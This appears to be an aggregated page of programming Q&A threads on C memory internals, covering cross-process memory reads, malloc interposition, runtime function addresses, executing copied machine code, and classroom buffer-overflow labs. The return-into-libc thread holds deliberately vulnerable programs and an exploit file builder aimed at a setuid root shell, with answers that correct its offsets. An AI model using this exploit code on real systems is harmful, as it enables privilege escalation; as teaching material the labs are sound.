How to read the stack segment of a C program? - c

I am developing a Hobby operating system, for that I want to know the mechanism of memory allocation in Linux, to understand that, I created a simple C program that defines a unsigned char of some hex numbers and then runs in a empty infinite loop, I did this to keep the process alive. Then I used pmap to get page-mapping information. Now I know the location of stack segment, also I have created a program that uses process_vm_readv syscall to read the contents of that address, all I see a stream of 00 when I read the contents of stack segment and some random numbers at last, How can I be able to figure out how the array is stored in the stack segment?
If that is possible, how can I analyze the hex stream to extract meaningful information ?

Here I am adding a demonstration for accessing address space of a remote process, There are two programs local.c which will read and write a variable in another program named remote.c (These program assumes sizeof(int)==4 )
local.c
#define _GNU_SOURCE
#include <sys/uio.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>
int main()
{
char buf[4];
struct iovec local[1];
struct iovec remote[1];
int pid;
void *addr;
printf("Enter remote pid\n");
scanf("%d",&pid);
printf("Enter remote address\n");
scanf("%p", &addr);
local[0].iov_base = buf;
local[0].iov_len = 4;
remote[0].iov_base = addr;
remote[0].iov_len = 4;
if(syscall(SYS_process_vm_readv,pid,local,1,remote,1,0) == -1) {
perror("");
return -1;
}
printf("read : %d\n",*(int*)buf);
*(int*)buf = 4321;
if(syscall(SYS_process_vm_writev,pid,local,1,remote,1,0) == -1) {
perror("");
return -1;
}
return 0;
}
remote.c
#define _GNU_SOURCE
#include <sys/uio.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>
int main()
{
int a = 1234;
printf("%d %p\n",getpid(),&a);
while(a == 1234);
printf ("'a' changed to %d\n",a);
return 0;
}
And if you run this on a Linux machine,
[ajith#localhost Desktop]$ gcc remote.c -o remote -Wall
[ajith#localhost Desktop]$ ./remote
4574 0x7fffc4f4eb6c
'a' changed to 4321
[ajith#localhost Desktop]$
[ajith#localhost Desktop]$ gcc local.c -o local -Wall
[ajith#localhost Desktop]$ ./local
Enter remote pid
4574
Enter remote address
0x7fffc4f4eb6c
read : 1234
[ajith#localhost Desktop]$
Using the similar way you can read stack frame to the io-vectors, But you need to know the stack frame structure format to parse the values of local variables from stack frame. stack frame contains function parameters, return address, local variables, etc

Related

How to use a buffer overflow to call another program?

I want to create a program exploit that calls testme.c to perform a buffer overflow operation which should call another program myname.c.
The code for the testme.c program:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv){
char a[100], b[100], c[100], d[100];
// Call the exploitable function
exploitable(argv[1]);
return(0);
}
int exploitable(char *arg){
// Make stack space of 10 bytes
char buffer[10];
// Copy input to buffer
strcpy(buffer, arg);
printf("The buffer says .. [%s/%p].\n", buffer, &buffer);
return(0);
}
The code for the myname.c program:
#include <stdio.h>
#include <time.h>
int main(){
printf("Name: SNS\n");
printf("Location: 41.13957, -104.81815\n");
time_t t;
time(&t);
printf("Date and time: %s\n",ctime(&t));
}
I have disabled address randomization and compiled both programs with -fno-stack-protector. Using gdb I can see that in testme.c, the return address after calling the exploitable function is 0x00000000000011a0:
testmemain
I need this to change to 0x00000000000011a9, which is the address of the main function of the myname.c program:
mynamemain
I know how to overflow the buffer variable in the exploitable function by giving a long enough string input to get a segmentation fault, but I cannot proceed any further than this. I have checked other tutorials in which the next step is to show how to spawn a shell, but I want testme.c to call myname.c through a buffer overflow. I am doing this on a 64-bit Ubuntu virtual machine.

Library interpositioning

I have been trying to intercept calls to malloc and free, following our textbook (CSAPP book).
I have followed their exact code, and nearly the same code that I found online and I keep getting a segmentation fault. I heard our professor saying something about printf that mallocs and frees memory so I think that this happens because I am intercepting a malloc and since I am using a printf function inside the intercepting function, it will call itself recursively.
However I can't seem to find a solution to solving this problem? Our professor demonstrated that intercepting worked ( he didn't show us the code) and prints our information every time a malloc occurs, so I do know that it's possible.
Can anyone suggest a working method??
Here is the code that I used and get nothing:
mymalloc.c
#ifdef RUNTIME
// Run-time interposition of malloc and free based on // dynamic linker's (ld-linux.so) LD_PRELOAD mechanism #define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h> #include <dlfcn.h>
void *malloc(size_t size) {
static void *(*mallocp)(size_t size) = NULL; char *error;
void *ptr;
// get address of libc malloc
if (!mallocp) {
mallocp = dlsym(RTLD_NEXT, "malloc"); if ((error = dlerror()) != NULL) {
fputs(error, stderr);
exit(EXIT_FAILURE);
}
}
ptr = mallocp(size);
printf("malloc(%d) = %p\n", (int)size, ptr); return ptr;
}
#endif
test.c
#include <stdio.h>
#include <stdlib.h>
int main(){
printf("main\n");
int* a = malloc(sizeof(int)*5);
a[0] = 1;
printf("end\n");
}
The result i'm getting:
$ gcc -o test test.c
$ gcc -DRUNTIME -shared -fPIC mymalloc.c -o mymalloc.so
$ LD_PRELOAD=./mymalloc.so ./test
Segmentation Fault
This is the code that I tried and got segmentation fault (from https://gist.github.com/iamben/4124829):
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
void* malloc(size_t size)
{
static void* (*rmalloc)(size_t) = NULL;
void* p = NULL;
// resolve next malloc
if(!rmalloc) rmalloc = dlsym(RTLD_NEXT, "malloc");
// do actual malloc
p = rmalloc(size);
// show statistic
fprintf(stderr, "[MEM | malloc] Allocated: %lu bytes\n", size);
return p;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define STR_LEN 128
int main(int argc, const char *argv[])
{
char *c;
char *str1 = "Hello ";
char *str2 = "World";
//allocate an empty string
c = malloc(STR_LEN * sizeof(char));
c[0] = 0x0;
//and concatenate str{1,2}
strcat(c, str1);
strcat(c, str2);
printf("New str: %s\n", c);
return 0;
}
The makefile from the git repo didn't work so I manually compiled the files and got:
$ gcc -shared -fPIC libint.c -o libint.so
$ gcc -o str str.c
$ LD_PRELOAD=./libint.so ./str
Segmentation fault
I have been doing this for hours and I still get the same incorrect result, despite the fact that I copied textbook code. I would really appreciate any help!!
One way to deal with this is to turn off the printf when your return is called recursively:
static char ACallIsInProgress = 0;
if (!ACallIsInProgress)
{
ACallIsInProgress = 1;
printf("malloc(%d) = %p\n", (int)size, ptr);
ACallIsInProgress = 0;
}
return ptr;
With this, if printf calls malloc, your routine will merely call the actual malloc (via mallocp) and return without causing another printf. You will miss printing information about a call to malloc that the printf does, but that is generally tolerable when interposing is being used to study the general program, not the C library.
If you need to support multithreading, some additional work might be needed.
The printf implementation might allocate a buffer only once, the first time it is used. In that case, you can initialize a flag that turns off the printf similar to the above, call printf once in the main routine (maybe be sure it includes a nice formatting task that causes printf to allocate a buffer, not a plain string), and then set the flag to turn on the printf call and leave it set for the rest of the program.
Another option is for your malloc routine not to use printf at all but to cache data in a buffer to be written later by some other routine or to write raw data to a file using write, with that data interpreted and formatted by a separate program later. Or the raw data could be written by a pipe to a program that formats and prints it and that is not using your interposed malloc.

Return-into-libc Attack

This is a two part question:
a)I am working with a Return-into-libc attack and not getting a root shell for some reason. I am supposed to take a vulnerable program: retlib.c.
/* retlib.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 128, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
badfile = fopen("badfile", "r");
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
I am using my exploit: exploit_1.c
/* exploit_1.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buf[40];
FILE *badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe86; // "/bin/sh"
*(long *) &buf[16] = 0x40076430; // system()
*(long *) &buf[20] = 0x40069fb0; // exit()
fwrite(buf, 40, 1, badfile);
fclose(badfile);
}
I found the addresses of system and exit using gdb:
(gdb) b main
Breakpoint 1 at 0x80484b7
(gdb) r
Starting program: /home/cs4393/project2/exploit_1
Breakpoint 1, 0x080484b7 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40076430 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x40069fb0 <exit>
(gdb)
I found the /bin/sh address using the myshell.c program:
//myshell.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void main (){
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Than using the commands:
[02/15/2015 21:46] cs4393#ubuntu:~/project2$ export MYSHELL=/bin/sh
[02/15/2015 21:46] cs4393#ubuntu:~/project2$ ./myshell
bffffe86
I feel like I have done everything right, but I keep getting a "Segmentation fault (core dumped)". I am using no -fstack-protector, chmod 4755 and ASLR turned off. Any thoughts on what is wrong?
b) I am also working with retlib-env.c:
/*retlib-env.c*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 128, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
char* shell=getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int)shell);
badfile = fopen("badfile", "r");
//system(shell);
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
This seems to me to be similar to part a, but "In this example, the vulnerable program retlib-env.c will reference MYSHELL environment." I don't know what I need to add to my exploit to make it work. Any hints or nudges in the right direction would be really helpful. I have MYSHELL, but i'm not really sure how I need to reference it to exploit the retlib-env.c. Shouldn't it be pretty similar to part a?
Probably the addresses of functions system(), exit() etc change at every program invocation. You cannot rely on loadng the pogram, degbugging for these addresses, closing the debug session and running the program again as the perogram may have been loaded at a completely different starting address the second time.
$gdb -q retlib
You need to find system and exit address of retlib not exploit. Exploit only prepare a exploit file. Retlib reads this file till buffer overflow. As far as I know the system address segment should start 12 after the buffer that means it will be buf[24].
The length of the program's name will influence the address of the environment variables in the stack. To get the correct address of string /bin/sh, you should keep the length of the program to search /bin/sh (i.e. myshell) equals the length of your final attack program (i.e. retlib).
Besides, you need to find out the return frame address which is supposed to be 4 plus the distance between ebp and &buffer in bof, which is supposed to be 20+4=24 rather than 16 in your code. You can verifiy it by gdb on the program compiled with flag -g.

C: Run machine code from memory

I want to execute some code from memory; my longterm goal is to create a self-decrypting app. To understand the matter I started from the roots.
I created the following code:
#define UNENCRYPTED true
#define sizeof_function(x) ( (unsigned long) (&(endof_##x)) - (unsigned long) (&x))
#define endof_function(x) void volatile endof_##x() {}
#define DECLARE_END_OF_FUNCTION(x) void endof_##x();
#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
unsigned char *bin;
#ifdef UNENCRYPTED
void hexdump(char *description, unsigned char *toDump, unsigned long length) {
printf("Hex-dump of \"%s\":\n", description);
for (int i = 0; i < length; i++) {
printf("%02x", toDump[i]);
}
printf("\n");
}
void hello_world() {
printf("Hello World!\n");
}
endof_function(hello_world);
#endif
int main (void) {
errno = 0;
unsigned long hello_worldSize = sizeof_function(hello_world);
bin = malloc(hello_worldSize);
//Compute the start of the page
size_t pagesize = sysconf(_SC_PAGESIZE);
uintptr_t start = (uintptr_t) bin;
uintptr_t end = start + (hello_worldSize);
uintptr_t pagestart = start & -pagesize;
bin = (void *)pagestart;
//Set mprotect for bin to write-only
if(mprotect(bin, end - pagestart, PROT_WRITE) == -1) {
printf("\"mprotect\" failed; error: %s\n", strerror(errno));
return(1);
}
//Get size and adresses
unsigned long hello_worldAdress = (uintptr_t)&hello_world;
unsigned long binAdress = (uintptr_t)bin;
printf("Address of hello_world %lu\nSize of hello_world %lu\nAdress of bin:%lu\n", hello_worldAdress, hello_worldSize, binAdress);
//Check if hello_worldAdress really points to hello_world()
void (*checkAdress)(void) = (void *)hello_worldAdress;
checkAdress();
//Print memory contents of hello_world()
hexdump("hello_world", (void *)&hello_world, hello_worldSize);
//Copy hello_world() to bin
memcpy(bin, (void *)hello_worldAdress, hello_worldSize);
//Set mprotect for bin to read-execute
if(mprotect(bin, end - pagestart, PROT_READ|PROT_EXEC) == -1) {
printf("\"mprotect\" failed; error: %s\n", strerror(errno));
return(1);
}
//Check if the contents at binAdress are the same as of hello_world
hexdump("bin", (void *)binAdress, hello_worldSize);
//Execute binAdress
void (*executeBin)(void) = (void *)binAdress;
executeBin();
return(0);
}
However I get an segfault-error; the programs output is the following:
(On OS X; i86-64):
Adress of hello_world 4294970639
Size of hello_world 17
Adress of bin:4296028160
Hello World!
Hex-dump of "hello_world":
554889e5488d3d670200005de95a010000
Hex-dump of "bin":
554889e5488d3d670200005de95a010000
Program ended with exit code: 9
And on my Raspi (Linux with 32-Bit ARM):
Adress of hello_world 67688
Size of hello_world 36
Hello World!
Hello World!
Hex-dump of "hello_world":
00482de90db0a0e108d04de20c009fe512ffffeb04008de50bd0a0e10088bde8d20b0100
Hex-dump of "bin":
00482de90db0a0e108d04de20c009fe512ffffeb04008de50bd0a0e10088bde8d20b0100
Speicherzugriffsfehler //This is german for memory access error
Where is my mistake?
The problem was, that the printf-call in hello_world is based on a relative jump address, which of course doesn't work in the copied function.
For testing purposes I changed hello_world to:
int hello_world() {
//_printf("Hello World!\n");
return 14;
}
and the code under "//Execute binAdress" to:
int (*executeBin)(void) = (void *)binAdress;
int test = executeBin();
printf("Value: %i\n", test);
which prints out 14 :D
On ARM, you have to flush the instruction cache using a function like cacheflush, or your code may not run properly. This is required for self-modifying code and JIT compilers, but is not generally needed for x86.
Additionally, if you move a chunk of code from one location to another, you have to fixup any relative jumps. Typically, calls to library functions are implemented as jumps to a relocation section, and are often relative.
To avoid having to fixup jumps, you can use some linker tricks to compile code to start at a different offset. Then, when decrypting, you simply load the decrypted code to that offset. A two-stage compilation process is usually used: compile your real code, append the resulting machine code to your decryption stub, and compile the whole program.

Find program's code address at runtime?

When I use gdb to debug a program written in C, the command disassemble shows the codes and their addresses in the code memory segmentation. Is it possible to know those memory addresses at runtime? I am using Ubuntu OS. Thank you.
[edit] To be more specific, I will demonstrate it with following example.
#include <stdio.h>
int main(int argc,char *argv[]){
myfunction();
exit(0);
}
Now I would like to have the address of myfunction() in the code memory segmentation when I run my program.
Above answer is vastly overcomplicated. If the function reference is static, as it is above, the address is simply the value of the symbol name in pointer context:
void* myfunction_address = myfunction;
If you are grabbing the function dynamically out of a shared library, then the value returned from dlsym() (POSIX) or GetProcAddress() (windows) is likewise the address of the function.
Note that the above code is likely to generate a warning with some compilers, as ISO C technically forbids assignment between code and data pointers (some architectures put them in physically distinct address spaces).
And some pedants will point out that the address returned isn't really guaranteed to be the memory address of the function, it's just a unique value that can be compared for equality with other function pointers and acts, when called, to transfer control to the function whose pointer it holds. Obviously all known compilers implement this with a branch target address.
And finally, note that the "address" of a function is a little ambiguous. If the function was loaded dynamically or is an extern reference to an exported symbol, what you really get is generally a pointer to some fixup code in the "PLT" (a Unix/ELF term, though the PE/COFF mechanism on windows is similar) that then jumps to the function.
If you know the function name before program runs, simply use
void * addr = myfunction;
If the function name is given at run-time, I once wrote a function to find out the symbol address dynamically using bfd library. Here is the x86_64 code, you can get the address via find_symbol("a.out", "myfunction") in the example.
#include <bfd.h>
#include <stdio.h>
#include <stdlib.h>
#include <type.h>
#include <string.h>
long find_symbol(char *filename, char *symname)
{
bfd *ibfd;
asymbol **symtab;
long nsize, nsyms, i;
symbol_info syminfo;
char **matching;
bfd_init();
ibfd = bfd_openr(filename, NULL);
if (ibfd == NULL) {
printf("bfd_openr error\n");
}
if (!bfd_check_format_matches(ibfd, bfd_object, &matching)) {
printf("format_matches\n");
}
nsize = bfd_get_symtab_upper_bound (ibfd);
symtab = malloc(nsize);
nsyms = bfd_canonicalize_symtab(ibfd, symtab);
for (i = 0; i < nsyms; i++) {
if (strcmp(symtab[i]->name, symname) == 0) {
bfd_symbol_info(symtab[i], &syminfo);
return (long) syminfo.value;
}
}
bfd_close(ibfd);
printf("cannot find symbol\n");
}
To get a backtrace, use execinfo.h as documented in the GNU libc manual.
For example:
#include <execinfo.h>
#include <stdio.h>
#include <unistd.h>
void trace_pom()
{
const int sz = 15;
void *buf[sz];
// get at most sz entries
int n = backtrace(buf, sz);
// output them right to stderr
backtrace_symbols_fd(buf, n, fileno(stderr));
// but if you want to output the strings yourself
// you may use char ** backtrace_symbols (void *const *buffer, int size)
write(fileno(stderr), "\n", 1);
}
void TransferFunds(int n);
void DepositMoney(int n)
{
if (n <= 0)
trace_pom();
else TransferFunds(n-1);
}
void TransferFunds(int n)
{
DepositMoney(n);
}
int main()
{
DepositMoney(3);
return 0;
}
compiled
gcc a.c -o a -g -Wall -Werror -rdynamic
According to the mentioned website:
Currently, the function name and offset only be obtained on systems that use the ELF
binary format for programs and libraries. On other systems, only the hexadecimal return
address will be present. Also, you may need to pass additional flags to the linker to
make the function names available to the program. (For example, on systems using GNU
ld, you must pass (-rdynamic.)
Output
./a(trace_pom+0xc9)[0x80487fd]
./a(DepositMoney+0x11)[0x8048862]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(main+0x1d)[0x80488a4]
/lib/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7e16775]
./a[0x80486a1]
About a comment in an answer (getting the address of an instruction), you can use this very ugly trick
#include <setjmp.h>
void function() {
printf("in function\n");
printf("%d\n",__LINE__);
printf("exiting function\n");
}
int main() {
jmp_buf env;
int i;
printf("in main\n");
printf("%d\n",__LINE__);
printf("calling function\n");
setjmp(env);
for (i=0; i < 18; ++i) {
printf("%p\n",env[i]);
}
function();
printf("in main again\n");
printf("%d\n",__LINE__);
}
It should be env[12] (the eip), but be careful as it looks machine dependent, so triple check my word. This is the output
in main
13
calling function
0xbfff037f
0x0
0x1f80
0x1dcb
0x4
0x8fe2f50c
0x0
0x0
0xbffff2a8
0xbffff240
0x1f
0x292
0x1e09
0x17
0x8fe0001f
0x1f
0x0
0x37
in function
4
exiting function
in main again
37
have fun!

Resources